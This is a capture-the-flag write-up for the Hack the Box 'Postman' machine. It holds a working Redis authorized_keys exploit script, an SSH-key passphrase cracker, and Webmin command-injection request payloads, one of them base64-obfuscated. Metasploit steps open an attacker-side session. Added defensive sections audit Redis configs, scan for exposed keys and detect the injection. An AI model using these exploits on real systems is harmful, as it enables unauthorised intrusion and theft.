Hack the Box (HTB) – Postman

Scanning

IP=10.10.10.160

nmap -sT -p 1-65535 $IP
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-06 10:29 EST
Nmap scan report for 10.10.10.160
Host is up (0.097s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
6379/tcp  open  redis
10000/tcp open  snet-sensor-mgmt

Nmap done: 1 IP address (1 host up) scanned in 342.86 seconds

Solution for user Matt

  • Use the redis exploit (see script exploit_redis.sh) to write my public key into the redis user's authorized_keys
  • Connect as the redis user with my private key
  • We find user Matt
./exploit_redis.sh
ssh -i /root/.ssh/id_rsa redis@10.10.10.160

redis@Postman:/home/Matt$ cat /etc/passwd | grep -v nologin
root:x:0:0:root:/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync
Matt:x:1000:1000:,,,:/home/Matt:/bin/bash
redis:x:107:114::/var/lib/redis:/bin/bash

Find Matt’s password

As redis user, connected with my private key

  • Explore the filesystem. We find a backup of Matt's private key in /opt/id_rsa.bak
  • Crack the passphrase of the private key (see script crack_private_key_rsa.sh)
  • We find the passphrase for the private key is computer2008
  • Escalate from redis to Matt and read the flag. Matt's password is the same as his RSA passphrase: a classic password reuse scenario.
ssh -i /root/.ssh/id_rsa redis@10.10.10.160
redis@Postman:~$ find / -name '*.bak' 2>/dev/null

redis@Postman:/home/Matt$ cat /opt/id_rsa.bak
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C
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-----END RSA PRIVATE KEY-----

# Escalate priv to Matt
su Matt
[computer2008]

Matt@Postman:~$ cat user.txt 
517ad0ec2458ca97af8d93aac08a2f3c

exploit_redis.sh

#!/bin/bash
#---------------------------------------------------------------------------
# Name : exploit_redis.sh
# Description : Postman challenge from Hackthebox
# Author : Lisandre.com
# Date : 2019-11-06
#---------------------------------------------------------------------------

# Change these configurations
TARGET_IP=10.10.10.160
TARGET_PORT=6379

# Key pair used for the ssh connection printed at the end; its .pub half is
# what gets written to the target.
RSA_KEY_PATH="/root/.ssh"
RSA_KEY_NAME="id_rsa"

# Pad the public key with newlines: SAVE writes it inside an RDB file
# surrounded by binary data, and the padding puts the key on a line of its
# own so that sshd's authorized_keys parser still reads it (the command
# substitution drops the trailing newlines, echo adds one back below).
KEY="$(printf '\n\n'; cat "${RSA_KEY_PATH}/${RSA_KEY_NAME}.pub"; printf '\n\n')"
echo "$KEY"

# Check if redis connection is working
echo "Testing connection to redis (expected: PONG)..."
if [ "$(redis-cli -h "${TARGET_IP}" -p "${TARGET_PORT}" ping 2>/dev/null)" != "PONG" ]; then
    echo "No answer from redis on ${TARGET_IP}:${TARGET_PORT}" >&2
    exit 1
fi

echo "Search for ssh key path on remote server..."
#redis-cli -h "${TARGET_IP}" -p "${TARGET_PORT}" config get '*' | grep ".ssh"

# upload remote shell /var/www/html
#echo "test redis" > ./redis.php

# Make sure the instance is a master: a read-only replica refuses writes.
redis-cli -h "${TARGET_IP}" -p "${TARGET_PORT}" SLAVEOF NO ONE
# Point the dump file at the redis user's authorized_keys, then store the key.
redis-cli -h "${TARGET_IP}" -p "${TARGET_PORT}" config set dbfilename "authorized_keys"
redis-cli -h "${TARGET_IP}" -p "${TARGET_PORT}" config set dir "/var/lib/redis/.ssh"
#redis-cli -h "${TARGET_IP}" -p "${TARGET_PORT}" keys '*' > "/var/lib/redis/.ssh/authorized_keys"
echo "$KEY" | redis-cli -h "${TARGET_IP}" -p "${TARGET_PORT}" -x set crackit

echo "Saving configurations..."
redis-cli -h "${TARGET_IP}" -p "${TARGET_PORT}" save

echo "Additional commands:"
echo "redis-cli -h ${TARGET_IP} -p ${TARGET_PORT} cmd"

echo "CONNECT TO HOST ${TARGET_IP}"
echo "ssh -i ${RSA_KEY_PATH}/${RSA_KEY_NAME} redis@${TARGET_IP}"

exit 0
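Defensive counterpart, added here and not part of the original script or writeup: a POSIX shell audit of a redis.conf for the settings the technique above relies on (no bind address, no requirepass, protected-mode switched off, CONFIG still reachable). The two sample configurations are constructed for the dry run, and the function names (conf_value, audit_redis_conf, write_sample_configs) are my own.

```shell
#!/bin/sh
# Audit a redis.conf for the settings that make the authorized_keys trick in
# exploit_redis.sh possible: a network-reachable Redis that accepts
# unauthenticated clients and still exposes CONFIG. Prints one FAIL line per
# finding and returns 0 only when nothing was found. Checks the classic
# directives; Redis 6+ ACLs are a further layer not inspected here.

# Effective value of a directive: last uncommented occurrence wins, as in
# Redis itself. Usage: conf_value DIRECTIVE FILE
conf_value() {
    sed -n "s/^[[:space:]]*$1[[:space:]][[:space:]]*//p" "$2" | tail -n 1
}

audit_redis_conf() {
    f="$1"
    rc=0

    # 1. Exposure: no bind line, or a wildcard address, means every host that
    #    can reach TCP/6379 can open a session.
    bind=$(conf_value bind "$f")
    if [ -z "$bind" ]; then
        echo "FAIL $f: no 'bind' directive, Redis listens on all interfaces"
        rc=1
    fi
    for addr in $bind; do
        case "$addr" in
            0.0.0.0|\*|::|-::\*)
                echo "FAIL $f: bind includes wildcard address '$addr'"
                rc=1 ;;
        esac
    done

    # 2. protected-mode only shields an instance with no bind and no password;
    #    switching it off removes even that safety net.
    if [ "$(conf_value protected-mode "$f")" = "no" ]; then
        echo "FAIL $f: protected-mode is off"
        rc=1
    fi

    # 3. Without requirepass every connection is fully privileged.
    if [ -z "$(conf_value requirepass "$f")" ]; then
        echo "FAIL $f: no 'requirepass', unauthenticated clients get full access"
        rc=1
    fi

    # 4. CONFIG reachable under its real name lets a client retarget
    #    dir/dbfilename and SAVE a dump wherever the redis user can write.
    if ! grep -iqE '^[[:space:]]*rename-command[[:space:]]+config[[:space:]]' "$f"; then
        echo "FAIL $f: CONFIG not renamed or disabled (rename-command CONFIG \"\")"
        rc=1
    fi
    return "$rc"
}

# Constructed sample configurations (not taken from the Postman box).
write_sample_configs() {
    dir=$(mktemp -d)
    cat > "$dir/weak.conf" <<'EOF'
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
EOF
    cat > "$dir/hardened.conf" <<'EOF'
bind 127.0.0.1 ::1
protected-mode yes
port 6379
requirepass CHANGE-ME-to-a-long-random-secret
rename-command CONFIG ""
dir /var/lib/redis
EOF
    echo "$dir"
}

samples=$(write_sample_configs)
for c in "$samples/weak.conf" "$samples/hardened.conf"; do
    if audit_redis_conf "$c"; then
        echo "OK   $c: no findings"
    fi
done
```

Run it against the live file with audit_redis_conf /etc/redis/redis.conf. For a setup like Postman's, the fixes are bind 127.0.0.1, a requirepass, rename-command CONFIG "" and, if a remote client needs Redis at all, a firewall rule restricting 6379 to that client.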

crack_private_key_rsa.sh

#!/bin/bash
#===========================================================================
# Script     : crack_private_key_rsa.sh
# Description: Crack passphrase on RSA private key
# Author     : Lisandre.com
# Date       : 2019-11-07
#===========================================================================

# UPDATE CONFIGURATIONS HERE
WL="/usr/share/wordlists/rockyou.txt"
PRIVATE_KEY="/root/.ssh/id_rsa_Matt"
OUTPUT="/root/.ssh/password.txt"

# Generate key to test
# openssl genrsa -des3 -out private.pem 2048

[ -r "$WL" ] || { echo "Wordlist not readable: $WL" >&2; exit 1; }
[ -r "$PRIVATE_KEY" ] || { echo "Private key not readable: $PRIVATE_KEY" >&2; exit 1; }

# Works on traditional PEM keys (header "Proc-Type: 4,ENCRYPTED", as in
# /opt/id_rsa.bak). openssl exits 0 only when the passphrase decrypts the key.
echo "Cracking RSA private key passphrase..."

while IFS= read -r line
do
    # -noout: test the passphrase without writing a decrypted key to disk
    if openssl rsa -in "$PRIVATE_KEY" -noout -passin "pass:$line" >/dev/null 2>&1; then
        echo "Passphrase: $line" | tee "$OUTPUT"
        exit 0
    fi
done < "$WL"

echo "Passphrase not found in $WL"
exit 1
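Added example (mine, not from the writeup): the audit a sysadmin would run to find the kind of file that made this step possible, a private key copied outside ~/.ssh that other users can read, and to tell whether it carries a passphrase at all. The sample tree it scans is constructed from header-only stand-ins, not real keys, and the function names (key_protection, exposure, scan_for_keys, write_sample_tree) are assumptions.

```shell
#!/bin/sh
# Audit a directory tree for private-key files that other users can read and
# report whether each one is passphrase-protected: the two properties that
# made the backup in /opt/id_rsa.bak worth cracking. Output per hit:
#   PATH OWNER MODE PROTECTION EXPOSURE

# Classify a file by its header. Traditional PEM ("Proc-Type: 4,ENCRYPTED")
# and PKCS#8 headers state the passphrase status in clear text; the OpenSSH
# format keeps it inside the base64 body, so those keys report "unknown".
key_protection() {
    if grep -qE '^(Proc-Type: 4,ENCRYPTED|-----BEGIN ENCRYPTED PRIVATE KEY-----)' "$1"; then
        echo encrypted
    elif grep -qE '^-----BEGIN (RSA |DSA |EC )?PRIVATE KEY-----' "$1"; then
        echo plaintext
    elif grep -q '^-----BEGIN OPENSSH PRIVATE KEY-----' "$1"; then
        echo unknown
    else
        echo not-a-key
    fi
}

# "world-readable" when the other-read bit is set, else "not-world-readable".
exposure() {
    if [ -n "$(find "$1" -perm -004)" ]; then
        echo world-readable
    else
        echo not-world-readable
    fi
}

# Walk ROOT and print one line per private key found. Keys are small, so
# files of 64 KiB or more are skipped to keep the grep cheap.
scan_for_keys() {
    find "$1" -type f -size -65536c 2>/dev/null | while IFS= read -r f; do
        prot=$(key_protection "$f")
        [ "$prot" = not-a-key ] && continue
        owner=$(ls -ld "$f" | awk '{print $3}')
        mode=$(ls -ld "$f" | awk '{print $1}')
        echo "$f $owner $mode $prot $(exposure "$f")"
    done
}

# Constructed sample tree (headers only, no real key material) for a dry run.
write_sample_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/opt" "$root/home/user/.ssh"
    cat > "$root/opt/id_rsa.bak" <<'EOF'
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,0000000000000000
Y29uc3RydWN0ZWQgc2FtcGxlLCBub3QgYSBrZXk=
-----END RSA PRIVATE KEY-----
EOF
    chmod 644 "$root/opt/id_rsa.bak"    # readable by every local user, as on Postman
    cat > "$root/home/user/.ssh/id_ed25519" <<'EOF'
-----BEGIN OPENSSH PRIVATE KEY-----
Y29uc3RydWN0ZWQgc2FtcGxlLCBub3QgYSBrZXk=
-----END OPENSSH PRIVATE KEY-----
EOF
    chmod 600 "$root/home/user/.ssh/id_ed25519"
    echo "just a note" > "$root/opt/notes.txt"
    echo "$root"
}

scan_for_keys "$(write_sample_tree)"
```

For the "unknown" cases, ssh-keygen -y -P '' -f KEY settles the question: it prints the public key only when the OpenSSH-format key has no passphrase and fails otherwise.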

Solution for root user

  • We will use the web application Webmin 1.910 on open port 10000 (found in the Scanning section above): https://10.10.10.160:10000
  • Log in to the application as user Matt with the password computer2008 found previously.
  • Search ExploitDB for Webmin.
  • This exploit should work: https://www.exploit-db.com/exploits/46984. We can use Metasploit, but this is also very easy to do manually with Burp Suite. Looking at the exploit, we can see the vulnerability resides in /package-updates/update.cgi

Manually with Burp Suite based on EDB-ID 46984

  • Keep note of the sid cookie value when logged in as Matt.
  • Intercept requests with Burp Suite and send any request to the Repeater module.
  • Replace the request with the content below, and change the sid cookie value.
  • Payload is: u=acl%2Fapt&u=%20%7C%20{command}&ok_top=Update+Selected+Packages

In this example, the payload is " | whoami" (the command is percent-encoded in the body below).

POST /package-updates/update.cgi HTTP/1.1
Host: 10.10.10.160:10000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.10.10.160:10000/package-updates/?xnavigation=1
Connection: close
Cookie: redirect=1; testing=1; sid=a610ef6d5cedc69187c88645603442de
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 85

u=acl%2Fapt&u=%20%7C%20%77%68%6f%61%6d%69&ok_top=Update+Selected+Packages

Output

...
<b>Installing package(s) with command <tt>apt-get -y  install acl  | whoami</tt> ..</b><p>
<pre>root
</pre>
...

Payload: " | cat /root/root.txt", encoded as: " | $(base64 -d <<< Y2F0IC9yb290L3Jvb3QudHh0)"

POST /package-updates/update.cgi HTTP/1.1
Host: 10.10.10.160:10000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.10.10.160:10000/package-updates/?xnavigation=1
Connection: close
Cookie: redirect=1; testing=1; sid=a610ef6d5cedc69187c88645603442de
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 178

u=acl%2Fapt&u=%20%7c%20%24%28%62%61%73%65%36%34%20%2d%64%20%3c%3c%3c%20%59%32%46%30%49%43%39%79%62%32%39%30%4c%33%4a%76%62%33%51%75%64%48%68%30%29&ok_top=Update+Selected+Packages
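Added detection example, not part of the writeup or of Webmin: a POSIX shell rule that flags POSTs to /package-updates/update.cgi whose u parameter contains shell metacharacters, the signature shared by the two requests above. The sample log is constructed (the two injected bodies are copied from the requests above, the client address is the attacking machine's 10.10.14.17 from the Metasploit section), and the function names (is_suspicious_update_body, check_request, scan_log) are mine.

```shell
#!/bin/sh
# Detection for the Webmin package-updates injection (EDB-ID 46984) used above:
# the "u" form parameter should only ever carry package names such as
# acl%2Fapt, so any shell metacharacter in it, literal or percent-encoded, is a
# red flag. Intended as a rule for a proxy or WAF that sees request bodies; a
# Common Log Format access log records no POST body and cannot be used for this.

# Return 0 (suspicious) if any u= parameter of a URL-encoded body contains a
# shell metacharacter, else 1. Percent-encoded forms match case-insensitively;
# a literal & cannot survive the split on &, so only its %26 form is listed.
is_suspicious_update_body() {
    printf '%s\n' "$1" | tr '&' '\n' | grep '^u=' |
        grep -qiE '%7c|%24|%60|%3b|%26|%0a|%0d|\||\$|`|;'
}

# Apply the rule only to POSTs to the vulnerable endpoint.
check_request() {
    [ "$1" = POST ] || return 1
    case "$2" in
        /package-updates/update.cgi|/package-updates/update.cgi\?*) ;;
        *) return 1 ;;
    esac
    is_suspicious_update_body "$3"
}

# Constructed sample, "client method path body" per line, as a body-logging
# proxy might write it. Lines 2 and 3 are the two injected bodies from the
# Burp requests above; line 1 is what a legitimate package update looks like.
SAMPLE_LOG='10.10.14.17 POST /package-updates/update.cgi u=acl%2Fapt&ok_top=Update+Selected+Packages
10.10.14.17 POST /package-updates/update.cgi u=acl%2Fapt&u=%20%7C%20%77%68%6f%61%6d%69&ok_top=Update+Selected+Packages
10.10.14.17 POST /package-updates/update.cgi u=acl%2Fapt&u=%20%7c%20%24%28%62%61%73%65%36%34%20%2d%64%20%3c%3c%3c%20%59%32%46%30%49%43%39%79%62%32%39%30%4c%33%4a%76%62%33%51%75%64%48%68%30%29&ok_top=Update+Selected+Packages
10.10.14.17 GET /package-updates/?xnavigation=1 -'

# Print "ALERT client method path" for every matching request in a log.
scan_log() {
    printf '%s\n' "$1" | while read -r client method path body; do
        if check_request "$method" "$path" "$body"; then
            echo "ALERT $client $method $path"
        fi
    done
}

scan_log "$SAMPLE_LOG"
```

A stricter variant allow-lists the value instead of deny-listing characters: package names here are letters, digits, ".", "+", "-" and the %2F separator, so anything else in u is rejected, which also covers encodings this deny-list does not name.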

Using Metasploit and "Package Updates Remote Command Execution" (EDB-ID 46984)

msfconsole
search webmin
use exploit/linux/http/webmin_packageup_rce
show options

set PASSWORD computer2008
set RHOSTS 10.10.10.160
set USERNAME Matt
set LHOST 10.10.14.17
run

[EXPLOIT IS WORKING!]
whoami
[root]
cat /root/root.txt
a257741c5bed8be7778c6ed95686ddce